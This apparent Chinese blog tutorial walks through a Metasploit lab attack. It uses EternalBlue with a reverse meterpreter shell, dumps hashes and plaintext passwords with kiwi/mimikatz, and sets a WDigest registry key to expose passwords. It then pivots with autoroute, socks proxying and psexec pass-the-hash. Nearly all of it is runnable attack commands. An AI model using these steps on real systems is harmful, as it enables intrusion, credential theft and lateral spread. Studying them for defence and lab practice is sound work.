metasploit进阶

已于 2022-03-18 09:26:40 修改
阅读量872 收藏 4
点赞数
分类专栏: 内网 # msf 文章标签: 安全
于 2022-02-28 01:01:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123171336
版权
内网 同时被 2 个专栏收录
36 篇文章 3 订阅
订阅专栏
msf
4 篇文章 0 订阅
订阅专栏

实验用的是靶机仅供参考

内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限

use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/reverse_tcp 
set rhost 10.10.10.136 
set lport 4444 
exploit

在这里插入图片描述

内网渗透 获取hash和明文

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba8854737681
8d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > run hashdump
在这里插入图片描述
在这里插入图片描述

在最新的版本中load mimikatz已经取消 现在使用kiwi模块

load kiwi

kali机用kiwi抓取密码 也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

在这里插入图片描述

查看当前kiwi的命令用help

help

creds_all #该命令可以列举系统中的明文密码

running as SYSTEM

kiwi_cmd

kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd sekurlsa::logonpasswords

kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords

在这里插入图片描述

在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

自XP以来,微软添加了一个名为WDigest的协议。该协议能够是Windows将明文密码存储在内存中,以方便用户登录本地计算机。

通过修改注册表的方式,即可解决内存中以明文存储密码的问题。在注册表添加一个键值,值为0

攻击:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

内网渗透 psexec

横向渗透

在metasploite中存在一个psexec模块可以使用获取的hash进行登录

1.先获取内网网段信息:

meterpreter > run get_local_subnets

在这里插入图片描述
虽然在我们的MSF中是可以对这个内网10段进行访问的,但我们在外面是并不能进行访问的:——》添加路由

2.建立路由

所以为了让msf外面的kali 其它工具也能同样进行访问内网10段,便于我们的渗透测试,所以需要建立路由,然后建立socks通道利用工具来

进行代理访问:

meterpreter > run autoroute -s 10.10.10.0/24 
meterpreter > run autoroute -p

或者

route add 10.10.10.0 255.255.255.0 1 
route print

在这里插入图片描述

3.设置socks代理

建立sockes隧道

search socks #查看socks 模块
use auxiliary/server/socks_proxy #切换到这个模块

在这里插入图片描述

在这里插入图片描述

通过受害者做跳板访问目标主机

4.编辑隧道配置文件

sudo vi /etc/proxychains4.conf

在这里插入图片描述

5.使用代理工具访问内网

使用proxychains4工具来代理:

在这里插入图片描述

6.代理失败方法

如果失败,可以编辑文件proxychains4
解决方法,proxychains不要启用DNS代理:
在这里插入图片描述vi /etc/proxychains4.conf

在这里插入图片描述
就能正常访问了

7.psexec 横向渗透

在metasploite中存在一个psexec模块可以使用获取的hash进行登录
这样我们就可以从外面访问到10.10.10.138,当我们在跳板机上通过hashdump查到了hash,我们就可以利用psexec这个模块来进行攻击,来探测密码是否一致,如果一致,那么我们就可以扩大了内网控制权,实现内网横向:

获取hash

hashdump
Administrator:500:add3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::

在这里插入图片描述

命令:

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp #正向连接
set RHOST 10.10.10.138 #被攻击机地址
set SMBUser administrator
set SMBPass add3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387 
show options #查看信息

在这里插入图片描述
ps:注意模块别选错了,捣鼓了半天发现模块选成了ms17-101/psexec。。。

设置全局代理

关于代理可看《《《第3小点》》》
虽然我们已经建立了路由,但并没有在msf中设置全局代理,所以是无法攻击成功的。

setg Proxies socks5:127.0.0.1:1080 #设置全局代理
set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。

在这里插入图片描述
修改rhost 接着在run就行
在这里插入图片描述

未完待续。。。

明月清风~~
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metasploit渗透测试【进阶
煮酒闲谈
09-21 1281
Metasploit渗透测试【进阶】摘要 记录一次完整的Metasploit测试!利用漏洞MS12-004 工具 : Metasploit Feamwork Netcat Let’s Go!【漏洞查证】!1:控制台执行 msfconsole 启动Metasploit :>>> msfconsole 2:输入命令 search ms12_004,我们来找找ms12-004漏洞的
Metasploit 进阶
weixin_30498921的博客
08-23 263
  本文是"T00LS Metasploit(第二季)"的文档版,是个人在观看视频动手操作的一个记录,仅供学习。文中会介绍Metasploit的一些基本使用:主要包括远程代码执行、MIDI文件解析远程代码执行、密码破解、生成后门等。 一、远程代码执行 MS08-067   首先,我们准备了一台靶机:192.168.1.103 [Windows XP Professional] m...
内网学习笔记03:msf添加路由&代理socks协议
最新发布
qq_74218299的博客
08-02 416
然后看使用参数,srvhost设置为0.0.0.0或者127.0.0.1都行,意思是转发本地流量,srvport为转发端口可更改可不改,version为socks版本,4或者5都行。当我们查询到靶机的网段为10.0.0.1时,可以直接给他添加路由(若网段为x.0.0.1则添加x.0.0.1)此时靶机相当于网关,对流量进行转发,实现内网的访问。添加成功后,这个路由只能msf使用,若我们想用namp进行内网探测,还需开启socks代理。输入代理类型,ip地址还有代理端口,照着抄上面的就行了。
metasploit进阶之路
weixin_30480583的博客
09-17 201
1.口令安全search mysql_login ssh_login2.hash传递渗透hashdump3.内核提权getsystem4.后门生成 linux: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On...
【渗透测试】Metasploit从入门到精通(1)
m0_70746078的博客
09-25 1707
渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。通过渗透测试可以知道目标机构的计算机系统是否易于受到攻击,现有的安全部署是否能妥善地抵御攻击,以及哪部分安全机制可能被绕过,等等。渗透测试的主要目的是改善目标机构的安全性。
Windows系统密码抓取与防护
qq_43590351的博客
09-10 1579
Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用 NTLM Hash(MD4加密) 真正是用户密码的哈希值 Windows操作系统中的密码一般由两部分组成: 一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下: Username:RID:LM-Ha
Metasploit进阶:模块定制与修改
Metasploit简介和基础知识 ### 1.1 Metasploit概述 Metasploit 是一款开源的渗透测试框架,旨在帮助安全研究人员和渗透测试人员有效地发现、利用和验证系统中的安全漏洞。 ### 1.2 Metasploit的使用场景 ...
Metasploit进阶:Meterpreter基础功能与使用
Metasploit简介与Meterpreter概述 ## 1.1 Metasploit框架简介 Metasploit框架是一款功能强大的开源渗透测试工具,旨在帮助安全研究人员和渗透测试人员有效地发现、利用和验证安全漏洞。Metasploit提供了丰富的...
Metasploit进阶:Post模块的使用与数据挖掘
## 1.1 什么是MetasploitMetasploit是一款开放源代码的渗透测试框架,用于开发和执行安全性测试、漏洞研究和渗透测试。它提供了一系列的工具,包括不同的模块,以帮助安全研究人员、渗透测试人员和安全工程师...
Metasploit进阶用法
05-09
Metasploit是一款强大的渗透测试工具,以下是一些进阶用法: 1. 使用自定义Payload:Metasploit默认提供了一些Payload,但你也可以使用自己编写的Payload。可以使用msfvenom生成自定义Payload,并使用msfconsole...
MSF搭建socks代理
谢公子的博客
05-01 7770
目录 搭建代理 添加路由 ​搭建Socks4a代理 搭建Socks5代理 连接代理 搭建代理 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。我们一般用socks4a和socks5进行代理。socks5可以设置用户名和密码。这里运行代理后,有时候MSF不会监听端口...
第15篇:内网横向中windows各端口远程登录哈希传递的方法总结
ABC_123的博客
06-09 3278
Part1 前言随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......
内网渗透——Metasploit代理转发
m0_65544268的博客
07-10 747
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
BUUCTF Windows系统密码 1
YueXuan_521的博客
06-13 1096
BUUCTF Windows系统密码 1
Windows用户密码的加密方法与破解
algae
04-21 8989
再研究Hastcat的时候涉及到了Windows的Hash破解,感觉这个地方还是有一些姿势点和细节的,特此写文章记录之。 Hash简介Hash 一般翻译为“散列”,也可直接音译为“哈希”的。这个加密函数对一个任意长度的字符串数据进行一次加密函数运算,然后返回一个固定长度的字符串。Hash主要用于信息安全领域中加密算法,渗透测试中获取目...
渗透第一次
gchoud的博客
04-26 1062
Hash主要用于信息安全领域中加密算法,渗透测试中获取目标系统的明文或Hash往往是整个渗透测试过程中重要的一环。在Windows系统中本机用户的密码Hash是放在本地的SAM文件里面,域内用户的密码Hash是存在域控的NTDS.DIT文件里面。Windows使用使用两种方法对用户密码进行哈希处理:其中,NTLM-HASH比LM-HASH的安全性要更高 自Windows Vista和Windows Server 2008开始,Windows取消LM hash。
内网渗透-Hash传递攻击
lza20001103的博客
04-15 1095
内网渗透-Hash传递攻击
Windows内网协议学习NTLM篇之NTLM基础介绍
子曰小玖的博客
05-08 5166
0x00 前言 这个系列文章主要讲ntlm认证相关的内容。以及着重介绍ntlm两大安全问题–PTH和ntlm_relay。 ntlm篇分为四篇文章 第1篇文章也是本文,这篇文章主要简单介绍一些基础概念以及引进一些相关的漏洞,比如Pass The Hash以及ntlm_relay。 其余三篇文章的内容全部都是讲ntlm_relay,这个安全问题是ntlm篇的重点内容。 第2篇文章主要讲触发...
利用MSF设置代理
Continuejww的博客
11-10 1247
通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门在此直接使用MSF生成后门MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;新版本的MSF已经整合了socks代理,在模块中模块中直接设置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值